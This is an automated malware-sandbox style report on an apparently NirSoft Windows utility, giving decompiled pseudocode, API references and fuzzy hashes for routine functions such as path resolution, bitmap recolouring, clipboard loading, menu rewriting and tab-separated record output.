<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
<table dir="rtl"><tr><td>, xrefs: 00409DA4
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040546C(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E004059AA( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040caf2
0x0040cb00
0x0040cb0b
0x0040cb14
0x0040cb33
0x0040cb3b
0x0040cb83
0x0040cbcc
0x0040cb85
0x0040cb8b
0x0040cb99
0x0040cba5
0x0040cbb4
0x0040cbb9
0x0040cbc0
0x0040cbc5
0x0040cb3d
0x0040cb43
0x0040cb51
0x0040cb5d
0x0040cb6a
0x0040cb75
0x0040cb7a
0x0040cbd4
0x0040cbd7
0x0040cbd7
0x0040cb19
0x0040cb1a
0x0040cb1b
0x00000000
0x0040cb21
0x0040cb02
0x00000000

APIs

wcschr.MSVCRT ref: 0040CB0B
wcscpy.MSVCRT ref: 0040CB1B

Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0

wcscpy.MSVCRT ref: 0040CB6A
wcscat.MSVCRT ref: 0040CB75
memset.MSVCRT ref: 0040CB51

Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0

memset.MSVCRT ref: 0040CB99
memcpy.MSVCRT ref: 0040CBB4
wcscat.MSVCRT ref: 0040CBC0

Strings

\systemroot, xrefs: 0040CB28

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DE1, Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00402DE1(void* __fp0) {
				void* _v24;
				void _v28;
				void* _v56;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				intOrPtr _v84;
				long _v88;
				intOrPtr _v92;
				int _v96;
				int _v100;
				intOrPtr _v104;
				int _v108;
				int _v112;
				intOrPtr _v128;
				unsigned int _t51;
				signed char _t52;
				intOrPtr _t53;
				intOrPtr _t64;
				struct HDC__* _t75;

				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v56, 0x18,  &_v28);
				_t75 = CreateCompatibleDC(0);
				_v64 = SelectObject(_t75, _v72);
				_v72 = GetSysColor(0xf);
				_v88 = GetPixel(_t75, 0, 0);
				_v96 = 0;
				if(_v56 > 0) {
					do {
						_v100 = 0;
						if(_v60 > 0) {
							do {
								_t51 = GetPixel(_t75, _v100, _v96);
								if(_t51 != _v100) {
									_t52 = _t51 & 0x000000ff;
									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
									asm("fild dword [esp+0x20]");
									asm("fistp qword [esp+0x28]");
									_t64 = _v84;
									_v92 = _t64;
									asm("fisub dword [esp+0x20]");
									asm("fldz");
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t52 & 0x00000041) == 0) {
										asm("fchs");
									}
									asm("fcomp qword [0x410b70]");
									asm("fnstsw ax");
									_t53 = _t64 + 1;
									if((_t52 & 0x00000001) != 0) {
										_t53 = _t64;
									}
									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
								} else {
									_push(_v96);
								}
								SetPixel(_t75, _v112, _v108, ??);
								_v128 = _v128 + 1;
							} while (_v128 < _v88);
						}
						_v96 = _v96 + 1;
					} while (_v96 < _v56);
				}
				SelectObject(_t75, _v76);
				DeleteDC(_t75);
				return _v104;
			}

0x00402e07
0x00402e0d
0x00402e15
0x00402e16
0x00402e17
0x00402e18
0x00402e19
0x00402e25
0x00402e36
0x00402e41
0x00402e54
0x00402e5e
0x00402e62
0x00402e66
0x00402e6c
0x00402e70
0x00402e74
0x00402e7a
0x00402e83
0x00402e89
0x00402e9c
0x00402ea3
0x00402ea7
0x00402eb3
0x00402eb7
0x00402ebb
0x00402ebf
0x00402ec3
0x00402ec5
0x00402ec7
0x00402ecc
0x00402ece
0x00402ece
0x00402ed0
0x00402ed6
0x00402edb
0x00402ede
0x00402ee0
0x00402ee0
0x00402ef6
0x00402e8b
0x00402e8b
0x00402e8b
0x00402f00
0x00402f06
0x00402f0e
0x00402e7a
0x00402f18
0x00402f20
0x00402e6c
0x00402f2f
0x00402f36
0x00402f46

APIs

GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
LoadImageW.USER32 ref: 00402E01
GetObjectW.GDI32(?,00000018,?), ref: 00402E25
CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
SelectObject.GDI32(00000000,?), ref: 00402E39
GetSysColor.USER32(0000000F), ref: 00402E45
GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
GetPixel.GDI32(00000000,?,?), ref: 00402E83
SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
SelectObject.GDI32(00000000,?), ref: 00402F2F
DeleteDC.GDI32(00000000), ref: 00402F36

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00405F82, Relevance: 16.6, APIs: 11, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405F82() {
				int _v8;
				int _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				struct HDC__* _t46;

				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v52 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v16, 0x18,  &_v52);
				_t46 = CreateCompatibleDC(0);
				_v28 = SelectObject(_t46, _v16);
				_v24 = GetSysColor(0xf);
				_v20 = GetPixel(_t46, 0, 0);
				_v12 = 0;
				if(_v44 > 0) {
					do {
						_v8 = 0;
						if(_v48 > 0) {
							do {
								if(GetPixel(_t46, _v8, _v12) == _v20) {
									SetPixel(_t46, _v8, _v12, _v24);
								}
								_v8 = _v8 + 1;
							} while (_v8 < _v48);
						}
						_v12 = _v12 + 1;
					} while (_v12 < _v44);
				}
				SelectObject(_t46, _v28);
				DeleteDC(_t46);
				return _v16;
			}

0x00405fa5
0x00405faa
0x00405fb0
0x00405fb1
0x00405fb2
0x00405fb3
0x00405fb4
0x00405fbe
0x00405fce
0x00405fd9
0x00405feb
0x00405ff3
0x00405ff6
0x00405ff9
0x00405ffb
0x00405ffe
0x00406001
0x00406003
0x0040600f
0x0040601b
0x0040601b
0x00406021
0x00406027
0x00406003
0x0040602c
0x00406032
0x00405ffb
0x0040603b
0x00406042
0x0040604f

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
LoadImageW.USER32 ref: 00405F9F
GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
SelectObject.GDI32(00000000,?), ref: 00405FD1
GetSysColor.USER32(0000000F), ref: 00405FDC
GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
GetPixel.GDI32(00000000,?,?), ref: 0040600A
SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
SelectObject.GDI32(00000000,?), ref: 0040603B
DeleteDC.GDI32(00000000), ref: 00406042

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405559, Relevance: 16.6, APIs: 11, Instructions: 59
clipboardmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t17;
				void* _t32;
				void* _t37;
				long _t39;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t17 = E00405338(_a4);
				_v12 = _t17;
				if(_t17 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t39 = GetFileSize(_t17, 0);
					_t5 = _t39 + 2; // 0x2
					_t32 = GlobalAlloc(0x2000, _t5);
					if(_t32 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t37 = GlobalLock(_t32);
						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
							GlobalUnlock(_t32);
							SetClipboardData(0xd, _t32);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

0x0040555f
0x00405563
0x0040556c
0x00405575
0x00405578
0x004055f1
0x0040557a
0x00405586
0x00405588
0x00405597
0x0040559b
0x004055d4
0x004055da
0x0040559d
0x004055a6
0x004055b9
0x00000000
0x004055bb
0x004055bd
0x004055c3
0x004055cc
0x004055cc
0x004055b9
0x004055e0
0x004055e8
0x004055f4
0x004055fe

APIs

EmptyClipboard.USER32 ref: 00405563

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
GlobalLock.KERNEL32 ref: 0040559E
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
GlobalUnlock.KERNEL32(00000000), ref: 004055C3
SetClipboardData.USER32 ref: 004055CC
GetLastError.KERNEL32 ref: 004055D4
CloseHandle.KERNEL32(?), ref: 004055E0
GetLastError.KERNEL32 ref: 004055EB
CloseClipboard.USER32 ref: 004055F4

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040228C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				struct _SYSTEMTIME _v88;
				void* _v92;
				struct _FILETIME _v96;
				void* __edi;
				signed int _t29;
				signed int _t34;
				signed int _t39;
				char* _t44;
				void* _t56;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t77;
				long _t90;
				intOrPtr _t91;
				void* _t97;
				signed int _t98;
				signed int _t99;

				_t97 = __esi;
				_t81 =  *((intOrPtr*)(__esi + 0x10));
				_t91 = _a4;
				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
				_t77 = 0x40f454;
				if(_t29 != 0) {
					_t77 = _t29;
				}
				_t99 = _t98 | 0xffffffff;
				_t106 =  *(_t97 + 0x40) & 0x00004000;
				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
					E004063DD(_t99, _t81, _t91, _t106, ".");
				}
				E004063DD(_t99, _t81, _t91, _t106, _t77);
				_t78 = "\t";
				E004063DD(_t99, _t81, _t91, _t106, "\t");
				_t107 =  *(_t97 + 0x40) & 0x00004000;
				_t34 = _t99;
				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
					_push(L"FALSE");
				} else {
					_push(L"TRUE");
				}
				E004063DD(_t34, _t81, _t91, _t107);
				E004063DD(_t99, _t81, _t91, _t107);
				_t82 =  *((intOrPtr*)(_t97 + 0x14));
				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
				_t108 = _t39;
				if(_t39 == 0) {
					_t39 = 0x40f454;
				}
				E004063DD(_t99, _t82, _t91, _t108, _t39);
				E004063DD(_t99, _t82, _t91, _t108, _t78);
				_t109 =  *(_t97 + 0x40) & 0x00000001;
				_t44 = L"TRUE";
				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
					_t44 = L"FALSE";
				}
				E004063DD(_t99, _t82, _t91, _t109, _t44);
				E004063DD(_t99, _t82, _t91, _t109, _t78);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v88.wYear = 0x7b2;
				_v88.wDay = 1;
				_v88.wMonth = 1;
				SystemTimeToFileTime( &_v88,  &_v96);
				_t90 = _v96.dwLowDateTime;
				asm("sbb ecx, edi");
				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
				_push(_t90);
				_push(_t56);
				_push(L"%I64d");
				_push(0x1f);
				_push( &_v88);
				L0040DFD6();
				_t96 = _v20;
				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
				_t80 = "\t";
				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
				_t85 =  *((intOrPtr*)(_t97 + 0x18));
				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
				_t110 = _t64;
				if(_t64 == 0) {
					_t64 = 0x40f454;
				}
				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
				_t111 = _t70;
				if(_t70 == 0) {
					_t70 = 0x40f454;
				}
				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
			}

0x0040228c
0x0040228c
0x00402295
0x0040229e
0x004022a5
0x004022aa
0x004022ac
0x004022ac
0x004022ae
0x004022b1
0x004022b7
0x004022c0
0x004022c0
0x004022c8
0x004022cd
0x004022d5
0x004022da
0x004022e0
0x004022e2
0x004022eb
0x004022e4
0x004022e4
0x004022e4
0x004022f0
0x004022f8
0x004022fd
0x00402305
0x0040230a
0x0040230c
0x0040230e
0x0040230e
0x00402316
0x0040231e
0x00402323
0x00402327
0x0040232c
0x0040232e
0x0040232e
0x00402336
0x0040233e
0x00402349
0x0040234a
0x0040234b
0x0040234c
0x00402358
0x0040235f
0x00402366
0x0040236d
0x0040238d
0x00402399
0x0040239d
0x004023a2
0x004023a3
0x004023a4
0x004023ad
0x004023af
0x004023b0
0x004023b5
0x004023c7
0x004023cc
0x004023d5
0x004023da
0x004023e4
0x004023e9
0x004023eb
0x004023ed
0x004023ed
0x004023ff
0x00402404
0x00402409
0x0040240e
0x00402410
0x00402412
0x00402412
0x00402433

APIs

SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
__aulldiv.LIBCMT ref: 0040239D
_snwprintf.MSVCRT ref: 004023B0

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Strings

%I64d, xrefs: 004023A4
FALSE, xrefs: 004022EB, 0040232E, 00402333
#A, xrefs: 00402299
#A, xrefs: 00402300
TRUE, xrefs: 004022E4, 00402327
#A, xrefs: 004023DD

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
API String ID: 1007903050-2074899967
Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
				wchar_t* _v0;
				int _v4;
				int _t39;
				wchar_t* _t49;
				void* _t51;
				int _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24;
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000);
						_t49 = wcschr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1;
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0);
								_pop(_t59);
							}
							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}

0x0040699e
0x004069a1
0x004069a9
0x004069b4
0x004069be
0x004069c2
0x004069c6
0x00406af3
0x00406af9
0x004069cc
0x004069d1
0x004069d8
0x004069dd
0x004069e4
0x004069f3
0x004069fe
0x00406a06
0x00406a0e
0x00406a1b
0x00000000
0x00000000
0x00406a26
0x00406acb
0x00406acb
0x00406acf
0x00406ad1
0x00406ad2
0x00406ad6
0x00406ad9
0x00406ade
0x00406ade
0x00000000
0x00406acf
0x00406a2c
0x00406a3a
0x00406a42
0x00406a4e
0x00406a53
0x00406a5a
0x00406a5e
0x00406a63
0x00406a71
0x00406a77
0x00406a7d
0x00406a7d
0x00406a65
0x00406a69
0x00406a69
0x00406a63
0x00406a8c
0x00406a94
0x00406a95
0x00406a9b
0x00406aa9
0x00406aaf
0x00406aaf
0x00406ac5
0x00406ac5
0x00000000
0x00406ae1
0x00406ae1
0x00406ae5
0x00406ae9
0x00000000
0x004069d1

APIs

GetMenuItemCount.USER32 ref: 004069B4
memset.MSVCRT ref: 004069D8
GetMenuItemInfoW.USER32 ref: 00406A13
memset.MSVCRT ref: 00406A42
wcschr.MSVCRT ref: 00406A4E
wcscat.MSVCRT ref: 00406AA9
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 00406AC5

Strings

6, xrefs: 004069FE
0, xrefs: 004069F3

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402754, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x00402761
0x00402768
0x0040276f
0x00402771
0x00402779
0x0040277d
0x004027a7
0x004027a7
0x004027af
0x004027b0
0x004027b5
0x004027d2
0x004027b7
0x004027c4
0x004027cd
0x004027cd
0x004027b5
0x00402785
0x0040278d
0x00402793
0x00402796
0x00402796
0x00402799
0x004027a1
0x00000000
0x004027a3
0x004027a3
0x00000000
0x004027a3

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
#17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

Strings

Error: Cannot load the common control classes., xrefs: 004027BE
comctl32.dll, xrefs: 0040275C
InitCommonControlsEx, xrefs: 0040277F
Error, xrefs: 004027B9

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
